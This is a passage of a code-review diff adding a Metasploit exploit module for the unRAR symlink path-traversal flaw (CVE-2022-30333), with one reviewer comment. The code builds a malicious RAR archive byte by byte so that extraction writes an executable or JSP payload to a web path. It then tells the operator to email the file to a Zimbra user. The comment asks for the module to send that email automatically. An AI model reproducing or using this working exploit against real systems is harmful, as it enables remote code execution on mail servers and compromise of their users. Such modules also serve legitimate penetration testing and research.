modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb

```diff
@@ -0,0 +1,245 @@
+    if relative_path.to_s.start_with?('../')
+      print_warning('Could not determine the public web path, disabling payload triggering')
+      return nil
+    end
+
+    return relative_path
+  end
+
+  def encode_as_rar(target_path, data)
+    unless target_path.length < 0x68
+      fail_with(Failure::BadConfig, 'The configured TARGET_PATH is too long (max length: 103 characters)')
+    end
+
+    unless data.length < 4096
+      fail_with(Failure::BadConfig, "The payload is too long (max length: 4096 bytes, it was #{data.length})")
+    end
+
+    # Null terminate the path, pad with NUL bytes, and invert the slashes
+    symlink_target = (target_path + "\0").gsub('/', '\\')
+    symlink_target.concat(rand(255).chr) while symlink_target.length < 0x68
+
+    symlink_name = rand_text_alpha(12)
+
+    # Pad the data to the full length
+    while data.length < 4096
+      data.concat(rand(255).chr) # TODO
+    end
+
+    # Build a RAR file from pieces, filling in the blanks with our payloads.
+    # The RAR format is non-free (and complex), so this is the easiest way to
+    # build a payload file
+    rar = "\x52\x61\x72\x21\x1a\x07\x01\x00\xf3\xe1\x82\xeb\x0b\x01\x05\x07\x00\x06\x01\x01\x80\x80\x80\x00"
+
+    # Create the first section (with the symlink), and attach with its CRC32
+    rar_section1 = ''
+    rar_section1.concat("\x94\x01\x02\x03\x78\x00\x04\x00\xa0\x08\x00\x00\x00\x00\x80\x00\x00\x0c")
+    rar_section1.concat(symlink_name) # Symlink filename
+    rar_section1.concat("\x0a\x03\x02\xae\xf0\x37\x1c\x91\x98\xd8\x01\x6c\x05\x02\x00\x68")
+    rar_section1.concat(symlink_target)
+    rar.concat([Zlib.crc32(rar_section1), rar_section1].pack('Va*'))
+
+    # Create the second section (with the data), and attach with its CRC32
+    rar_section2 = ''
+    rar_section2.concat("\x28\x02\x03\x0b\x80\x20\x04\x80\x20\x20")
+    rar_section2.concat([Zlib.crc32(data)].pack('V'))
+    rar_section2.concat("\x80\x00\x00\x0c")
+    rar_section2.concat(symlink_name) # Data filename (same as symlink to overwrite it)
+    rar_section2.concat("\x0a\x03\x02\x00\x36\xe3\x00\x91\x98\xd8\x01")
+    rar.concat([Zlib.crc32(rar_section2), rar_section2].pack('Va*'))
+
+    rar.concat(data)
+
+    # This tail doesn't seem necessary, but I don't want to mess with it
+    rar.concat("\x1d\x77\x56\x51\x03\x05\x04\x00")
+
+    rar
+  end
+
+  def exploit
+    payload = generate_payload_exe
+
+    if datastore['EncodeAsJsp']
+      print_status('Encoding the payload as a .jsp file')
+      payload = Msf::Util::EXE.to_jsp(payload)
+    end
+
+    # Create a file
+    target_filename = generate_target_filename
+    print_status("Target filename: #{target_filename}")
+    file_create(encode_as_rar(target_filename, payload))
+
+    # If it's Zimbra, try to trigger the payload
+    if target.name == 'Zimbra Collaboration Suite'
+      print_good('File created! Email the file above to any user on the target Zimbra server')
```

Comment:
Would it be possible to actually send the email from the module? I believe this [mixin](https://github.com/rapid7/metasploit-framework/blob/fbc4893a84e026f79bba87568dfc264e7970e85d/lib/msf/core/exploit/remote/smtp_deliver.rb) can help.